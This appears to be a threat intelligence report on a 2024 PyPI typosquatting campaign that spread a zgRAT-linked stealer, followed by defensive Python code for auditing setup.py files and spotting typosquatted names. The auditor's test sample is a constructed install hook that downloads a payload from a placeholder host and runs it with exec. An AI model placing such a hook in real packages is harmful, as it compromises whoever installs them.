Typosquatting Campaign Targets Python Developers with Hundreds of Malicious Libraries

An automated typosquatting campaign targeted popular Python libraries hosted on the Python Package Index (PyPI).

Executive Summary

Security firm Phylum discovered and reported an automated typosquatting campaign, detected on March 26, 2024, that targeted popular Python libraries hosted on the Python Package Index (PyPI). The attackers published over 500 typosquatted variations of well-known packages such as TensorFlow, BeautifulSoup, requests and requirements. The package names mimicked the legitimate ones, but each package's setup.py file carried malicious code that delivered a payload linked to the malware family known as zgRAT.

Community Threat Assessment

Because the PyPI Development Team temporarily suspended new project creation and new user registration in response to the campaign, the RH-ISAC Intelligence Team assesses with high confidence that it presents a medium threat to organizations in the retail and hospitality sector. RH-ISAC recommends that Core Members review the intelligence in this report and the linked Phylum report, which contains additional details on the campaign.

Technical Details

According to the latest reporting from Phylum, the attack began with experimentation on a package called schubismomv3, in which the attackers tested malware deployment techniques. They initially experimented with install hooks and later shifted to smuggling an encrypted payload into a local file and executing it from there. Although the setup.py files varied, the payload stayed consistent: primarily a data stealer linked to zgRAT. After the schubismomv3 experiment, the attackers published insanepackagev1414, which differed by pulling a smaller payload from a remote URL instead of embedding the entire payload in the setup file. This allowed variations under different package names to be deployed more quickly, and that ability to scale enabled the attackers to launch a wide-scale typosquatting campaign against PyPI.
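To show what the install-hook technique described above looks like from the defender's side, here is an added example (not code from the Phylum report or from the campaign) that statically audits a setup.py with Python's ast module before anything in it runs. Both setup.py samples are constructed for this illustration and are only parsed, never executed; the placeholder URL, the class and package names, and the sets of modules and calls treated as suspicious are assumptions chosen for the example, not indicators from the campaign.

```python
import ast

# Constructed sample modelled on the technique described above: an install
# hook that fetches a remote payload and executes it. It is only parsed by
# the auditor, never run; the URL and names are placeholders, not the
# campaign's real values.
SUSPICIOUS_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import base64, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        blob = urllib.request.urlopen("http://example.invalid/payload").read()
        exec(base64.b64decode(blob))

setup(name="reqeusts", version="1.0.0", cmdclass={"install": PostInstall})
'''

# Constructed benign sample: a plain declarative setup() call.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="mypkg", version="0.1.0", packages=["mypkg"])
'''

# Heuristic indicator sets (assumptions for this example, not a complete list).
HOOK_BASES = {"install", "develop", "egg_info", "build_py"}
NETWORK_MODULES = {"urllib", "requests", "socket", "http", "httpx"}
EXEC_CALLS = {"exec", "eval", "compile", "__import__"}
SPAWN_CALLS = {("os", "system"), ("os", "popen"), ("subprocess", "Popen"),
               ("subprocess", "run"), ("subprocess", "call"),
               ("subprocess", "check_output")}


def _base_name(base):
    # A class base may be written as `install` or as `module.install`.
    if isinstance(base, ast.Name):
        return base.id
    if isinstance(base, ast.Attribute):
        return base.attr
    return None


def audit_setup(source):
    """Return a list of human-readable findings for one setup.py source."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ClassDef):
            # Subclassing a setuptools command is how install-time hooks are wired in.
            for base in node.bases:
                if _base_name(base) in HOOK_BASES:
                    findings.append(f"install hook: class {node.name} subclasses {_base_name(base)}")
        elif isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_MODULES:
                    findings.append(f"network import: {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            root = (node.module or "").split(".")[0]
            if root in NETWORK_MODULES:
                findings.append(f"network import: {node.module}")
        elif isinstance(node, ast.Call):
            func = node.func
            if isinstance(func, ast.Name) and func.id in EXEC_CALLS:
                findings.append(f"dynamic execution: {func.id}()")
            elif (isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name)
                  and (func.value.id, func.attr) in SPAWN_CALLS):
                findings.append(f"process spawn: {func.value.id}.{func.attr}()")
        elif isinstance(node, ast.keyword) and node.arg == "cmdclass":
            # cmdclass is the setup() argument that registers custom command classes.
            findings.append("cmdclass override passed to setup(): custom build/install step")
    return findings


def is_suspicious(source):
    """True when the static audit produced at least one finding."""
    return bool(audit_setup(source))


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        print(label, audit_setup(src))
```

A setup.py that subclasses an install command, imports a network module and calls exec() trips every rule here; a declarative setup() call trips none. The check is a heuristic and must be read that way: the later stage of this campaign smuggled an encrypted payload into a local file, so a file write followed by a decode or decrypt step deserves the same attention as a URL fetch, and legitimate packages do occasionally ship custom cmdclass entries. Static review of this kind complements, rather than replaces, installing only hash-pinned dependencies (for example pip's --require-hashes mode), which prevents a typosquat from being resolved in the first place.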

The typosquatting attack commenced around 15:06 UTC on March 26, 2024, with variations targeting different libraries. After a brief pause, it resumed the next day with additional variations. In total, 566 typosquat publications were identified. PyPI promptly removed the packages and, to prevent further uploads, temporarily suspended new project creation and new user registration. According to the PyPI status page, the incident has since been marked "resolved".

Typosquat Variations

The attackers launched the following typosquat variations (566 in total):

36 variations of requests
61 variations of py-cord
35 variations of colorama
36 variations of capmonstercloudclient
20 variations of pillow
24 variations of bip-utils
29 variations of tensorflow
26 variations of BeautifulSoup
26 variations of PyGame
15 variations of SimpleJson
38 variations of Matplotlib
26 variations of PyTorch
67 variations of CustomTKInter
28 variations of selenium
17 variations of playwright
15 variations of asyncio
67 variations of requirements
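Typosquat names are, by construction, a small edit away from the legitimate name, so a useful gate is to measure the edit distance between every requested package and a list of high-value targets. The following is an added example, not code from Phylum or RH-ISAC, that does this in Python for the target list above. The requested names fed to it (reqeusts, colorrama, tensorflwo and the requirement lines) are constructed for the illustration and are not the variations observed in the campaign; the distance threshold of 2 is likewise an assumption. Names are normalised the way PyPI does (case-insensitive, with runs of "-", "_" and "." treated as one "-"), and the distance counts an adjacent-character swap as a single edit, since that is a common typo.

```python
import re

# Legitimate packages the report lists as typosquat targets. "BeautifulSoup"
# and "PyTorch" are the project names used in the report; their PyPI
# distribution names are beautifulsoup4 and torch, so both forms are included.
TARGETED_PACKAGES = [
    "requests", "py-cord", "colorama", "capmonstercloudclient", "pillow",
    "bip-utils", "tensorflow", "BeautifulSoup", "beautifulsoup4", "PyGame",
    "SimpleJson", "Matplotlib", "PyTorch", "torch", "CustomTKInter",
    "selenium", "playwright", "asyncio", "requirements",
]


def normalize(name):
    # PEP 503 normalisation: case-insensitive; runs of '-', '_' and '.' become one '-'.
    return re.sub(r"[-_.]+", "-", name).lower()


def osa_distance(a, b):
    # Optimal string alignment distance: insertion, deletion, substitution and
    # adjacent transposition each cost 1.
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def classify(name, known=TARGETED_PACKAGES, max_distance=2):
    """Return (verdict, closest_known_name, distance).

    verdict is "exact" (the name is a known package), "suspect" (within
    max_distance edits of one, so a likely typosquat) or "unrelated".
    """
    target = normalize(name)
    ranked = sorted((osa_distance(target, normalize(k)), normalize(k)) for k in known)
    distance, closest = ranked[0]
    if distance == 0:
        return ("exact", closest, 0)
    if distance <= max_distance:
        return ("suspect", closest, distance)
    return ("unrelated", None, distance)


def flag_requirements(lines):
    """Scan requirement lines and return (requested, closest, distance) for suspects."""
    flagged = []
    for line in lines:
        line = line.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        m = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)  # the project-name prefix
        if not m:
            continue
        verdict, closest, dist = classify(m.group(0))
        if verdict == "suspect":
            flagged.append((m.group(0), closest, dist))
    return flagged


if __name__ == "__main__":
    # Constructed requirement lines for the demonstration.
    sample = ["requests==2.31.0", "reqeusts>=1.0  # typo", "numpy", "colorrama", "tensorflwo"]
    for hit in flag_requirements(sample):
        print("suspect: %s looks like %s (distance %d)" % hit)
```

Run against a requirements file, the scan flags "reqeusts" and "colorrama" as one edit away from requests and colorama while letting the exact names and an unrelated name such as numpy through. Treat a hit as a trigger for review rather than an automatic block: distance-2 neighbours of short names will sometimes be legitimate projects, and the threshold catches only the character-level variations of the kind this campaign used, not look-alike names built by appending words or swapping in a different suffix.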
